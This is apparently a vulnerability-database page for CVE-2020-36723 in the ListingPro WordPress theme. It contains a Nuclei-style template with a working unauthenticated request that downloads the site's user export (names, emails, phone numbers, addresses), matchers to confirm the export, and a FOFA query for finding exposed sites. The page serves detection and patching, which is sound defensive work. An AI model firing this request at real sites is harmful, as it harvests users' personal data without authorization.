CVE-2020-36723: ListingPro < 2.6.1 - Sensitive Data Disclosure

2025-08-01 ListingPro PoC Public

Description

The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~/listingpro-plugin/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.

PoC

id: CVE-2020-36723

info:
  name: ListingPro < 2.6.1 - Sensitive Data Disclosure
  author: ritikchaddha
  severity: high
  description: |
    The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~/listingpro-plugin/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.
  impact: |
    Unauthenticated attackers can extract sensitive user data including usernames, email addresses, phone numbers, and physical addresses from all registered users.
  remediation: |
    Upgrade to ListingPro version 2.6.1 or later.
  reference:
    - https://wpscan.com/vulnerability/096e6e16-c14d-42da-8ba3-c271db3385a4/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36723
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-36723
    epss-score: 0.01608
    epss-percentile: 0.74673
    cwe-id: CWE-200
    cpe: cpe:2.3:a:cridio:listingpro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cridio
    product: listingpro
    fofa-query: body="/wp-content/plugins/listingpro"
  tags: cve,cve2020,wordpress,wp-plugin,wp,exposure,listingpro,vuln,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/index.php?download-lp-users=yes"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "UserName"
          - "Email"
          - "Full Name"
          - "Listings"
        condition: and

      - type: word
        part: header
        words:
          - "filename="

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a61c4096dbcadd84e7db5f4365e40429ac0020b8f96c57b32bea865f4c6e63b302204ac337da1d91af840f1f9b515015bb90fdc19e0873bcb54d3182a12256f8294b:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities